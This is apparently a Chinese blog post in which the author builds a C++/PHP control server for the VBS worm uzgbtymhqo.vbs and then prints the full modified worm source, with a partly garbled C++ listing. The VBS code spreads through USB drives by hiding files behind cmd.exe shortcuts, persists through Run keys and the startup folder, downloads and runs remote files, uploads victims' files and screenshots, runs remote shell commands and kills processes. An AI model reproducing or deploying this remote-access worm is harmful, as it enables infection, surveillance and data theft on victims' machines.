uzgbtymhqo.vbs服务器端测试代码编写

原创 2015年07月09日 11:36:55
虽然是一个很小的vbs病毒,但是功能也是足够齐全的,会下载上传文件,删除文件,枚举进程,查看系统相关的信息,更新木马,查看磁盘目录及目录下的文件。
苦于没有服务器端,自己动手写了一个。
思路:用C++动态更新php文件内容,而php文件则作为客户端请求的响应脚本。如需执行命令只需在C++中输入即可。
运行界面:


服务器端目录如下:

主控php代码:(在is-recving/index.php下)

template.php主要目的是收集客户端的user-agent信息,而user-agent信息则被病毒修改为系统的信息,并保存在info.txt下。
最后info.txt内容是这样的:


template.php代码如下:

服务器端代码如下:
#include "fstream"
#include "iostream"
#include 
#define MAXLENGTH 256
#define COMMANDS_COUNT 13
using namespace std;
int length(char* str)
{
	int i=0;
	while(str[i])
	{
		i++;
	}
	return i;
}
int _tmain(int argc, _TCHAR* argv[])
{
	string  dst="D:\\Documents\\Chapter1\\is-ready\\index.php";
	char* cmd=new char[MAXLENGTH];
	string example[COMMANDS_COUNT];
	for(int i=0;ishellobj.run \\\"calc\\\"\";";
	example[2]="echo \"exit-process<|>\\\"explorer.exe\\\"\";";
	example[3]="echo \"site-send<|>http://127.0.0.1:8080/download/test.jpg<|>xiao.jpg\";";
	example[4]="echo \"recv<|>E:\\Study\\Hack\\wooyun\\wooyun monthy -1.pdf\";";
	example[5]="echo \"enum-driver\";";
	example[6]="echo \"enum-faf<|>E:\\\\\";";
	example[7]="echo \"enum-process\";";
	example[8]="echo 'cmd-shell<|>net user Xiao  /delete';";
	example[9]="echo \"delete<|>E:\\Study\\Hack\\wooyun\\\\test.txt\";(这里两个斜杠是php下,\\\\t转义)";
	example[10]="echo \"sleep<|>5000\";";
	example[11]="echo uninstall;";
	cout<<"命令示例:"<10000",18);
			break;
		}
		fout.write("

最后,我在vbs上面加上了定时截图上传的功能。截图有python的PIL库来实现(实际中,机器都安装python了,应该也不会中这种弱智病毒的啦。。)
最后附上修改后的完整vbs病毒代码:
'<[ recoder : houdini (c) skype : houdini-fx ]>

'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=

host = "127.0.0.1"
port = 8080
installdir = "%temp%"
lnkfile = true
lnkfolder = true

'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=

dim shellobj 
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")

'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=

installname = wscript.scriptname
startup = shellobj.specialfolders ("startup") & "\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
spliter = "<" & "|" & ">"
sleep = 5000 
dim response
dim cmd
dim param
info = ""
usbspreading = ""
startdate = ""
dim oneonce

'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
'on error resume next
instance
'msgbox("response")
while true

install

response = ""
'execute<|>shellobj.run  ""
response = post ("is-ready","")
'msgbox(response)
cmd = split (response,spliter)
select case cmd (0)
case "execute"
      param = cmd (1)
	  'msgbox(param)
      execute param
case "update"
      param = cmd (1)
      oneonce.close
      set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
      oneonce.write param
      oneonce.close
      shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
      wscript.quit 
case "uninstall"
      uninstall
case "send"
'		msgbox(cmd(1)&"  "&cmd(2))
      download cmd (1),cmd (2)
case "site-send"
      sitedownloader cmd (1),cmd (2)
case "recv"
      param = cmd (1)
      upload (param)
case  "enum-driver"
      post "is-enum-driver",enumdriver
case  "enum-faf"
      param = cmd (1)
      post "is-enum-faf",enumfaf (param)
case  "enum-process"
      post "is-enum-process",enumprocess   
case  "cmd-shell"
      param = cmd (1)
      post "is-cmd-shell",cmdshell (param)
case  "delete"
      param = cmd (1)
      deletefaf (param) 
case  "exit-process"
      param = cmd (1)
      exitprocess (param) 
case  "sleep"
      param = cmd (1)
      sleep = eval (param)        
end select
shellobj.run "python.exe " & chr(34) & installdir & "screencap.py" & chr(34),vbhide
wscript.sleep 500

set fs=wscript.createobject("scripting.filesystemobject") 

if (fs.FileExists("tmp.jpg")) then 

set f=filesystemobj.getfile("tmp.jpg")
name=date&" "&time
name=replace(name,":","-")
name=replace(name,"/","-")
f.name=name&".jpg"
upload(name&".jpg")
filesystemobj.deletefile name&".jpg"

end if
wscript.sleep sleep

wend


sub install
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon

upstart
for each drive in filesystemobj.drives

if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
    filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
    if  filesystemobj.fileexists (drive.path & "\" & installname)  then
        filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
    end if
    for each file in filesystemobj.getfolder( drive.path & "\" ).Files
        if not lnkfile then exit for
        if  instr (file.name,".") then
            if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
                file.attributes = 2+4
                if  ucase (file.name) <> ucase (installname) then
                    filename = split(file.name,".")
                    set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk") 
                    lnkobj.windowstyle = 7
                    lnkobj.targetpath = "cmd.exe"
                    lnkobj.workingdirectory = ""
                    lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
                    fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\") 
                    if  instr (fileicon,",") = 0 then
                        lnkobj.iconlocation = file.path
                    else 
                        lnkobj.iconlocation = fileicon
                    end if
                    lnkobj.save()
                end if
            end if
        end if
    next
    for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
        if not lnkfolder then exit for
        folder.attributes = 2+4
        foldername = folder.name
        set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk") 
        lnkobj.windowstyle = 7
        lnkobj.targetpath = "cmd.exe"
        lnkobj.workingdirectory = ""
        lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
        foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\") 
        if  instr (foldericon,",") = 0 then
            lnkobj.iconlocation = folder.path
        else 
            lnkobj.iconlocation = foldericon
        end if
        lnkobj.save()
    next
end If
end If
end if
next
err.clear
end sub

sub uninstall
on error resume next
dim filename
dim foldername

shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true

for  each drive in filesystemobj.drives
if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
    for  each file in filesystemobj.getfolder ( drive.path & "\").files
         on error resume next
         if  instr (file.name,".") then
             if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
                 file.attributes = 0
                 if  ucase (file.name) <> ucase (installname) then
                     filename = split(file.name,".")
                     filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
                 else
                     filesystemobj.deletefile (drive.path & "\" & file.name)
                 end If
             else
                 filesystemobj.deletefile (file.path) 
             end if
         end if
     next
     for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
         folder.attributes = 0
     next
end if
end if
end if
next
wscript.quit
end sub

function post (cmd ,param)

post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd&"/index.php", false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function

function information
on error resume next
if  inf = "" then
    inf = hwid & spliter 
    inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter 
    inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter

    set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
    set os = root.execquery ("select * from win32_operatingsystem")
    for each osinfo in os
       inf = inf & osinfo.caption & spliter  
       exit for
    next
    inf = inf & "plus" & spliter
    inf = inf & security & spliter
    inf = inf & usbspreading
	inf = inf & date&"	"&time
    information = inf  
else
    information = inf
end if
end function


sub upstart ()
on error resume Next

shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true

end sub


function hwid
on error resume next

set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
for each disk in disks
    if  disk.volumeserialnumber <> "" then
        hwid = disk.volumeserialnumber
        exit for
    end if
next
end function


function security 
on error resume next

security = ""

set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
    versionstr = split (objitem.version,".")
next
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
for  x = 1 to ubound (versionstr)
	 osversion = osversion &  versionstr (i)
next
osversion = eval (osversion)
if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"

set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)

for each objantivirus in colantivirus
    security  = security  & objantivirus.displayname & " ."
next
if security  = "" then security  = "nan-av"
end function


function instance
on error resume next

usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
if usbspreading = "" then
   if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
      usbspreading = "true - " & date&"  "
   else
      usbspreading = "false - " & date&"  "
   end if
   shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
end If

generateScreenCaptureCode
upstart

set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort =  filesystemobj.getfile (installdir & installname)
'msgbox(scriptfullnameshort.shortpath)
'msgbox(installfullnameshort.shortpath)
if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then 
    shellobj.run "wscript.exe  " & chr(34) & installdir & installname & Chr(34)  '成品用这个shellobj.run "wscript.exe  //B" & chr(34) & installdir & installname & Chr(34)
    wscript.quit 
end If
err.clear
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
if  err.number > 0 then wscript.quit
end function


sub sitedownloader (fileurl,filename)

strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send

set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if
 
if objhttpdownload.status = 200 then
   dim  objstreamdownload
   set  objstreamdownload = createobject("adodb.stream")
   with objstreamdownload
		.type = 1 
		.open
		.write objhttpdownload.responsebody
		.savetofile strsaveto
		.close
   end with
   set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if 
end sub

sub download (fileurl,filedir)

if filedir = "" then 
   filedir = installdir
end if

strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp")
objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
objhttpdownload.send ""
     
set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if
if  objhttpdownload.status = 200 then
    dim  objstreamdownload
	set  objstreamdownload = createobject("adodb.stream")
    with objstreamdownload 
		 .type = 1 
		 .open
		 .write objhttpdownload.responsebody
		 .savetofile strsaveto
		 .close
	end with
    set objstreamdownload  = nothing
end if
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if 
end sub


function upload (fileurl)

dim  httpobj,objstreamuploade,buffer
set  objstreamuploade = createobject("adodb.stream")
with objstreamuploade 
     .type = 1 
     .open
	 .loadfromfile fileurl
	 buffer = .read
	 .close
end with
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp")
httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving/index.php?&filename="&mid (fileurl, instrrev (fileurl,"\") + 1) , false
httpobj.send buffer
end function


function enumdriver ()

for  each drive in filesystemobj.drives
if   drive.isready = true then
     enumdriver = enumdriver & drive.path & "	" & drive.drivetype & "	" & drive.freespace/(1024*1024*1024) & "GB" & spliter
end if
next
end Function
function enumfaf (enumdir)

enumfaf = enumdir & spliter
for  each folder in filesystemobj.getfolder (enumdir).subfolders
     enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
next

for  each file in filesystemobj.getfolder (enumdir).files
     enumfaf = enumfaf & file.name & "|" & file.size  & "|" & "f" & "|" & file.attributes & spliter

next
end function


function enumprocess ()

on error resume next

set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)

dim objitem
for each objitem in colitems
	enumprocess = enumprocess & objitem.name & "|"
	enumprocess = enumprocess & objitem.processid & "|"
    enumprocess = enumprocess & objitem.executablepath & spliter
next
end function

sub exitprocess (pid)
on error resume next
shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub

sub deletefaf (url)
on error resume next

filesystemobj.deletefile url
filesystemobj.deletefolder url

end sub

function cmdshell (cmd)

dim httpobj,oexec,readallfromany

set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
   readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
   readallfromany = oexec.stderr.readall
else 
   readallfromany = ""
end if

cmdshell = readallfromany
end function
sub generateScreenCaptureCode()
a=2
set objFSO=createobject("Scripting.FileSystemObject")
set objTextFile=objFSO.OpenTextFile(installdir&"screencap.py",a,true)
objTextFile.writeline("from PIL import ImageGrab")
'objTextFile.writeline("import time")
'objTextFile.writeline("now=time.strftime('%Y-%m-%d %H-%M-%S',time.localtime(time.time()))")
objTextFile.writeline("im=ImageGrab.grab()")
objTextFile.writeline("im.save('tmp.jpg','jpeg')")
objTextFile.close
end sub
要测试请先在服务器端安装PHP,客户端安装Python和PIL库。

相关文章推荐

Delphi7高级应用开发随书源码

  • 2003年04月30日 00:00
  • 676KB
  • 下载

通过对一个病毒源码的分析,了解VBS脚本语言的应用

通过对一个病毒源码的分析,了解VBS脚本语言的应用    读了《将VBScript拒之“窗”外》一文,心里有些感触,觉得是不是少了两个字,应为《将VBScript病毒拒之“窗”外》,VBScript何...
  • Suprman
  • Suprman
  • 2006年10月02日 21:03
  • 2949

Delphi7高级应用开发随书源码

  • 2003年04月30日 00:00
  • 676KB
  • 下载

Delphi7高级应用开发随书源码

  • 2003年04月30日 00:00
  • 676KB
  • 下载

实验室缉毒记之uzgbtymhqo.vbs

去年的事情了,写下来记一下吧。 周三在机房插上U盘后,周四的数据库上机发现U盘里所有东西都变成lnk,如下图: 随便打开一个lnk内容如下: C:\windows\system32\cm...

I2S音频总线学习(一)数字音频技术

IIS音频总线学习(一)数字音频技术 一、声音的基本概念     声音是通过一定介质传播的连续的波。 图1 声波 重要指标: 振幅:音量的大小周期:重复出现的时间间隔频率:指信号每秒钟变化的次...
  • ce123
  • ce123
  • 2011年11月01日 00:19
  • 40268

Linux下c语言实验Websocket通讯 含客户端和服务器测试代码

Websocket是一种可双向通讯的网络协议,其底层的数据收发是基于socket的,所以使用c语言来实现理论上是没有问题的,主要难点在于协议中要求对个别数据进行加密处理,这些加密方法(库)在java、...

linux系统管理客户端2--串口实现测试代码编写

1、实现界面如下:
  • jiezhj
  • jiezhj
  • 2014年06月12日 14:56
  • 588
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:uzgbtymhqo.vbs服务器端测试代码编写
举报原因:
原因补充:

(最多只允许输入30个字)